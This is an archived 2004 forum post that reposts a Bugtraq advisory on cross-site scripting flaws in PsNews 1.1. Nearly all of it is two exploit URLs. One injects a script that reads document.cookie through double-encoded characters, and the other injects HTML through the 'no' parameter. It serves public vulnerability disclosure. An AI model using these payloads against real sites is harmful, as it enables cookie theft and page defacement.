Help
-
Search
-
Member List
-
Calendar
Full Version:
Bug Xss In Psnews 1.1
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
qcred11
Sep 8 2004, 06:43 PM
QUOTE
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky_at_nicponie.org
*WWW:
http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|BugCross-Site Scripting (XSS) w PsNews 1.1 |
-----------------------------------------------
Exploit:
a)
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Source:
http://seclists.org/lists/bugtraq/2004/Sep/0066.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
